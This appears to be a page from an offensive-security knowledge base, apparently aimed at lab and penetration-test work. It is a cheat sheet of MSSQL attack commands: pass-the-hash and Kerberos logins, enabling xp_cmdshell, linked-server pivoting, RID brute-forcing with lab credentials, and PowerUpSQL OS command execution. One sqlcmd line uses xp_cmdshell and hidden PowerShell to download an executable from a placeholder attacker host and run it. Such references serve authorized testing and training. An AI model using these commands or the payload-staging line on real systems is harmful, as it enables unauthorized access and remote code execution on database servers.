Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 05. SQL / MSSQL

Tooling

MSSQL tooling should support the methodology: connect, enumerate, test permissions, execute queries, pivot, and clean up.


mssqlclient.py

SQL authentication:

mssqlclient.py user:Passw0rd!@10.10.10.5 -port 1433

Windows authentication:

mssqlclient.py LAB/user:Passw0rd!@10.10.10.5 -windows-auth

Pass-the-hash:

mssqlclient.py LAB/user@10.10.10.5 -windows-auth -hashes :8846F7EAEE8FB117AD06BDD830B7586C

Kerberos:

KRB5CCNAME=/tmp/cc mssqlclient.py LAB/user@10.10.10.5 -k -no-pass

AES key:

mssqlclient.py LAB/user@10.10.10.5 -k -aesKey HEX_AESKEY

Handy flags:

-db DB
-dc-ip IP
-debug

Useful prompt commands:

enum_impersonate
exec_as_login sa
enable_xp_cmdshell
xp_cmdshell whoami
enum_links
use_link LINKNAME

One-shot from shell:

echo "SELECT @@version;" | mssqlclient.py user:pass@10.10.10.5 -db master
echo "SELECT name FROM sys.databases;" | mssqlclient.py LAB/user:pass@10.10.10.5 -windows-auth

sqlcmd

SQL auth:

sqlcmd -S 10.10.10.5 -U sa -P 'Passw0rd!'

TCP and port:

sqlcmd -S tcp:10.10.10.5,1433 -U user -P pass

Windows Integrated auth:

sqlcmd -S 10.10.10.5 -E

Encryption with trusted lab cert:

sqlcmd -S 10.10.10.5 -U user -P pass -N -C

Choose database:

sqlcmd -S 10.10.10.5 -U user -P pass -d master

One-shot:

sqlcmd -S 10.10.10.5 -U user -P pass -Q "SELECT @@VERSION;"
sqlcmd -S 10.10.10.5 -U user -P pass -Q "SELECT name FROM sys.databases;"
sqlcmd -S 10.10.10.5 -U user -P pass -Q "EXEC sp_who2;"

Run a script:

sqlcmd -S 10.10.10.5 -U user -P pass -i script.sql -o output.txt

CSV-style output:

sqlcmd -S 10.10.10.5 -U user -P pass -d master \
  -Q "SELECT name FROM sys.databases;" \
  -W -s"," -h-1 -w 8192 -o dbs.csv

Stage and run payload through xp_cmdshell:

sqlcmd -S 10.10.10.5 -U sa -P pass -Q "EXEC xp_cmdshell 'powershell -w hidden -c iwr http://ATTACKER/s.exe -o C:\Windows\Temp\s.exe'; EXEC xp_cmdshell 'C:\Windows\Temp\s.exe';"

Useful switches:

-Q   run and exit
-q   run and stay
-l   login timeout
-t   query timeout
-b   exit non-zero on SQL error
-r 1 send errors to stderr
-W   trim spaces
-s   separator
-h-1 suppress headers
-w   output width

NetExec MSSQL

RID brute:

nxc mssql 10.129.181.153 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth

Use this for username discovery and SQL authentication validation during lab enumeration.


mssqlpwner

Interactive mode:

mssqlpwner SIGNED.HTB/mssqlsvc:'purPLE9795!@'@10.129.58.60 -windows-auth interactive

Example direct query:

(interactive) direct-query "SELECT suser_sname(owner_sid) AS owner FROM sys.databases WHERE name='msdb';"

Linked server output example:

[*] Chosen linked server: DC01
[*] Result: (Key: owner) sa

PowerUpSQL

PowerUpSQL is useful after Windows foothold or domain context.

Common workflow:

Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLServerInfo -Instance SQL01
Get-SQLServerLink -Instance SQL01
Get-SQLServerLinkCrawl -Instance SQL01
Invoke-SQLOSCmd -Instance SQL01 -Command "whoami"

Use tool output as leads. Confirm manually with T-SQL before building an escalation chain.